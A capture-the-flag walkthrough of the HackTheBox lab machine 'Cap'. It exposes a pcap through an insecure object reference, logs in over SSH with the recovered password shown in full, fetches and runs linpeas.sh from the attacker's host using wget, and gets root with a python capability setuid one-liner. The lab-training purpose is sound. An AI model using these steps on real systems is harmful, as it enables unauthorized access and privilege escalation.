Cap

A relatively easy Linux box in HackTheBox, you can root it in less than an hour.

nmap

(base) [psdon@arch cap]$ mkdir nmap  
(base) [psdon@arch cap]$ sudo rustscan -a 10.10.10.245 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web server is running on port 80.

Web Enumeration

There's an interesting section in the sidebar which is located on /capture and when you go to that URL, you will be redirected to /data/<int>

Every time I visit /capture, the integer parameter in /data/1 was incrementing by 1.

So I change it to /data/0 and I got a pcap file, and I analyze it on wireshark and found a credentials on it.

Initial Shell

I login using that credentials on SSH, and looks like we got an initial shell. Sweet :D

(base) [psdon@arch cap]$ ssh nathan@10.10.10.245                                                         
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.                             
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.                           
This key is not known by any other names                                                                 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                 
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.                          
nathan@10.10.10.245's password: Buck3tH4TF0RM3!                                                                         
nathan@cap:~$

Post Exploitation

First, let's transfer linpeas.sh from our machine to the target machine

(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/                                                  
(base) [psdon@arch linPEAS]$ ls                                                                           
builder  images  linpeas.sh  README.md                                                                    
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80                                                
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

You can find the machine IP address by executing the following.

(base) [psdon@arch ~]$ ip a | grep tun0
9: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    inet 10.10.14.15/23 scope global tun0

Then transfer the script using wget

nathan@cap:~$ wget http://10.10.14.15/linpeas.sh                                                         
--2021-08-29 19:09:04--  http://10.10.14.15/linpeas.sh                                                   
Connecting to 10.10.14.15:80... connected.

nathan@cap:~$ chmod +x linpeas.sh

Then run linpeas.sh

nathan@cap:~$ ./linpeas.sh                                                                                                                                                                                         
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                                         
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄                                                                                                                                                                   
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄                                                                                                                                                               
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄                                                                                                                                                          
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄                                                                                                                                                        
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄                                                                                                                                                         
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄                                                                                                                                                        
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄                                                                                                                                                        
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄                                                                                                                                                        
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄                                                                                                                                                        
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄                                                                                                                                                        
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄                                                                                                                                                         
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                         
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                                                                                                                                        
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀                                                                                                                                                         
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀                                                                                                                                                                  
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀                                                                                                                                                                       
                                                                                                                                                                                                                   
      /---------------------------------------------------------------------------\                                                                                                                                
      |                             Do you like PEASS?                            |                                                                                                                                
      |---------------------------------------------------------------------------|                                                                                                                                
      |         Become a Patreon    :     https://www.patreon.com/peass           |                                                                                                                                
      |         Follow on Twitter   :     @carlospolopm                           |                                                                                                                                
      |         Respect on HTB      :     SirBroccoli & makikvues                 |                                                                                                                                
      |---------------------------------------------------------------------------|                                                                                                                                
      |                                 Thank you!                                |                                                                                                                                
      \---------------------------------------------------------------------------/                                                                                                                                
        linpeas-ng by carlospolop

I noticed python3.8 binary was set a capability.

Privilege Escalation

We can gain root by executing the following command

nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'                                                                                                                 
root@cap:/var/www/html#

PreviousHackTheBox

Last updated 4 years ago

Was this helpful?